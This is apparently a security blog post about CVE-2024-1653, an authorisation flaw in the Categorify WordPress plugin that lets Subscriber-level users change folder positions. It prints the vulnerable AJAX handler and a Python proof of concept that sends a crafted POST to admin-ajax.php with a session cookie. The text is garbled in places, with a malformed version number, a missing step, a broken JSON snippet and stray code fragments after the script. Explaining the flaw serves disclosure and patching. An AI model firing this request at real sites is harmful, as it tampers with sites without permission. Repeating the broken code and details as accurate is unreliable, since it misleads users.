CVE-2024-1653 - How a Simple WordPress Flaw in the Categorify Plugin Lets Low-Level Users Mess With Your Categories
WordPress plugins are useful, but they can sometimes open doors for attackers. One plugin in the spotlight right now is Categorify. If you use this for managing folders and categories on your WordPress site, pay close attention. There’s a security problem that could let even your most basic, non-privileged users make changes you never intended.
This post breaks down CVE-2024-1653—a flaw in *Categorify* up to version 1..7.4—and shows why even beginners need to care. We’ll use simple language and you’ll see actual vulnerable code. If you’re a site owner, developer, or just security-curious, keep reading.
What is Categorify?
Categorify (WordPress.org listing) is a plugin that lets you create custom folders for your posts, pages, and custom post types. It’s loved for making content management easier, especially for bigger sites.
The Core Issue: Missing User Level Checks
Normally, plugins check what kind of user is making a request. You want to make sure only admins can make important changes, right? But in Categorify, there’s a function called categorifyAjaxUpdateFolderPosition. In every version up to and including 1..7.4, it doesn’t check user capabilities. That means *any logged-in user*—even a plain Subscriber—can mess with category folder positions and metadata.
> “An authenticated attacker with just Subscriber-level access can update the position or even the metadata of other taxonomies.”
>
> — WPScan vulnerability report
The Vulnerable Code
Let’s peek at what’s going wrong in the plugin.
You’ll find something like this in the categorify.php (or a similar file)
add_action('wp_ajax_categorifyAjaxUpdateFolderPosition', 'categorifyAjaxUpdateFolderPosition');
function categorifyAjaxUpdateFolderPosition() {
// Missing: current_user_can() validation!
$folder_id = intval($_POST['folder_id']);
$new_position = intval($_POST['new_position']);
// Update folder position in the DB
update_term_meta($folder_id, 'folder_position', $new_position);
echo json_encode(['status' => 'success']);
wp_die();
}
Do you see the problem? There is no line like this at the top
if ( ! current_user_can('edit_terms') ) {
wp_die( 'Unauthorized', 403 );
}
That means as long as you’re signed in—even just with a Subscriber account—you can change things only Editors or Admins should be able to.
Log in as a Subscriber.
2. Craft an AJAX request to the /wp-admin/admin-ajax.php?action=categorifyAjaxUpdateFolderPosition endpoint.
`json
{
"new_position": 1
}
Here’s how an attacker could do it in Python (assuming they’re logged in)
import requests
url = 'https://yourwordpresssite.com/wp-admin/admin-ajax.php?action=categorifyAjaxUpdateFolderPosition';
cookies = {
'wordpress_logged_in_xxxx': 'your_subscriber_session_cookie_here'
}
data = {
'folder_id': '1',
'new_position': '99'
}
r = requests.post(url, data=data, cookies=cookies)
print(r.text)
With just a session cookie and the right POST request, BAM! Even your most basic users can rearrange taxonomies.
}
// Rest of function...
}
More References
- WPScan detailed advisory
- Categorify on WordPress plugin directory
- Common plugin security mistakes (Make WordPress)
Final Words: Takeaways
Don’t trust plugin defaults—always check for recent security issues. Even simple plugins can have simple, but powerful, holes. CVE-2024-1653 is yet another reminder to:
Use tools like WPScan or Patchstack to monitor vulnerabilities
If your site uses Categorify and you haven’t patched or updated it—do it now.
*Got questions or need more details? Drop a comment below and let’s keep your sites safe together!*
Timeline
Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC